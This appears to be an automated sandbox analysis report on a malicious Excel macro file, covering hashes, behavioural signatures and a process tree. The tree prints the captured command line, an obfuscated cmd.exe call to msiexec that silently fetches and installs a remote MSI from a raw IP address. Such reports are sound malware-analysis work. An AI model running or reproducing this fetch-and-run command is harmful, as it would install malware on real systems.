Analysis
- max time kernel: 138s
- max time network: 149s
- platform: windows10_x64
- resource: win10v200430
- submitted: 30-06-2020 17:58
- Static task: static1
- Behavioral task: behavioral1
  Sample: SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
  Resource: win7
- Behavioral task: behavioral2
  Sample: SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
  Resource: win10v200430
General
- Target: SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
- Size: 172KB
- MD5: ac016bd363b76505c4b5f55fa92bf343
- SHA1: 245a98cac3ab0bb615aa265c2774e34c1fcf2bd3
- SHA256: 95bd7a62ced0c80358c8e3fd12bb8acb9aecea2b35fa43e7a343cb38ae233e5f
- SHA512: 812ed62c7379e690f3e9af0cde79d1e38e5ed0971f98f0662584ea885e03bc8b36e31dfc7c54a2be2f5989605ff59e6d53a4e4b7f875fff0f8ac9dc40bdbb7c2
Malware Config
Signatures
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes:
    pid 1628, process EXCEL.EXE (reported 12 times)
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
    pid 4036 (process cmd.exe), pid_target 1628 (target process EXCEL.EXE)
- Use of msiexec (install) with remote resource (1 IoC)
  Processes:
    pid 4064, process msiexec.exe
- Blacklisted process makes network request (1 IoC)
  Processes:
    flow 15, pid 3544, process msiexec.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
    EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
    EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid 1628, process EXCEL.EXE
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
    PID 1628 wrote to memory of 4036: EXCEL.EXE (1628) -> cmd.exe (4036) (reported twice)
    PID 4036 wrote to memory of 4064: cmd.exe (4036) -> msiexec.exe (4064) (reported twice)
- Suspicious use of AdjustPrivilegeToken (32 IoCs)
  Processes:
    Token: SeShutdownPrivilege, pid 4064, msiexec.exe
    Token: SeIncreaseQuotaPrivilege, pid 4064, msiexec.exe
    Token: SeSecurityPrivilege, pid 3544, msiexec.exe
    Token: SeCreateTokenPrivilege, pid 4064, msiexec.exe
    Token: SeAssignPrimaryTokenPrivilege, pid 4064, msiexec.exe
    Token: SeLockMemoryPrivilege, pid 4064, msiexec.exe
    Token: SeIncreaseQuotaPrivilege, pid 4064, msiexec.exe
    Token: SeMachineAccountPrivilege, pid 4064, msiexec.exe
    Token: SeTcbPrivilege, pid 4064, msiexec.exe
    Token: SeSecurityPrivilege, pid 4064, msiexec.exe
    Token: SeTakeOwnershipPrivilege, pid 4064, msiexec.exe
    Token: SeLoadDriverPrivilege, pid 4064, msiexec.exe
    Token: SeSystemProfilePrivilege, pid 4064, msiexec.exe
    Token: SeSystemtimePrivilege, pid 4064, msiexec.exe
    Token: SeProfSingleProcessPrivilege, pid 4064, msiexec.exe
    Token: SeIncBasePriorityPrivilege, pid 4064, msiexec.exe
    Token: SeCreatePagefilePrivilege, pid 4064, msiexec.exe
    Token: SeCreatePermanentPrivilege, pid 4064, msiexec.exe
    Token: SeBackupPrivilege, pid 4064, msiexec.exe
    Token: SeRestorePrivilege, pid 4064, msiexec.exe
    Token: SeShutdownPrivilege, pid 4064, msiexec.exe
    Token: SeDebugPrivilege, pid 4064, msiexec.exe
    Token: SeAuditPrivilege, pid 4064, msiexec.exe
    Token: SeSystemEnvironmentPrivilege, pid 4064, msiexec.exe
    Token: SeChangeNotifyPrivilege, pid 4064, msiexec.exe
    Token: SeRemoteShutdownPrivilege, pid 4064, msiexec.exe
    Token: SeUndockPrivilege, pid 4064, msiexec.exe
    Token: SeSyncAgentPrivilege, pid 4064, msiexec.exe
    Token: SeEnableDelegationPrivilege, pid 4064, msiexec.exe
    Token: SeManageVolumePrivilege, pid 4064, msiexec.exe
    Token: SeImpersonatePrivilege, pid 4064, msiexec.exe
    Token: SeCreateGlobalPrivilege, pid 4064, msiexec.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls"
  - Suspicious use of SetWindowsHookEx
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/new-order0456.msi /qn
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\msiexec.exe
      Command line: msiExec /i http://199.195.250.60/gg/new-order0456.msi /qn
      - Use of msiexec (install) with remote resource
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Blacklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken